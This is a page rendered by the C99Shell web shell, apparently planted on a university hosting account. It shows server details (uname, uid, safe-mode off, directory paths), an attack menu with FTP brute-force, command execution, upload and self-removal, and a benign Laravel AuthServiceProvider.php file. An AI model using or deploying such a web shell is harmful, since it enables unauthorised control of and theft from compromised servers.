!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/laravel/framework/src/Illuminate/Auth/   drwxr-xr-x
Free 116.5 GB of 200.55 GB (58.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AuthServiceProvider.php (2.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Auth;

use 
Illuminate\Auth\Access\Gate;
use 
Illuminate\Support\ServiceProvider;
use 
Illuminate\Contracts\Auth\Access\Gate as GateContract;
use 
Illuminate\Contracts\Auth\Authenticatable as AuthenticatableContract;

class 
AuthServiceProvider extends ServiceProvider
{
    
/**
     * Register the service provider.
     *
     * @return void
     */
    
public function register()
    {
        
$this->registerAuthenticator();

        
$this->registerUserResolver();

        
$this->registerAccessGate();

        
$this->registerRequestRebindHandler();
    }

    
/**
     * Register the authenticator services.
     *
     * @return void
     */
    
protected function registerAuthenticator()
    {
        
$this->app->singleton('auth', function ($app) {
            
// Once the authentication service has actually been requested by the developer
            // we will set a variable in the application indicating such. This helps us
            // know that we need to set any queued cookies in the after event later.
            
$app['auth.loaded'] = true;

            return new 
AuthManager($app);
        });

        
$this->app->singleton('auth.driver', function ($app) {
            return 
$app['auth']->guard();
        });
    }

    
/**
     * Register a resolver for the authenticated user.
     *
     * @return void
     */
    
protected function registerUserResolver()
    {
        
$this->app->bind(
            
AuthenticatableContract::class, function ($app) {
                return 
call_user_func($app['auth']->userResolver());
            }
        );
    }

    
/**
     * Register the access gate service.
     *
     * @return void
     */
    
protected function registerAccessGate()
    {
        
$this->app->singleton(GateContract::class, function ($app) {
            return new 
Gate($app, function () use ($app) {
                return 
call_user_func($app['auth']->userResolver());
            });
        });
    }

    
/**
     * Register a resolver for the authenticated user.
     *
     * @return void
     */
    
protected function registerRequestRebindHandler()
    {
        
$this->app->rebinding('request', function ($app$request) {
            
$request->setUserResolver(function ($guard null) use ($app) {
                return 
call_user_func($app['auth']->userResolver(), $guard);
            });
        });
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0365 ]--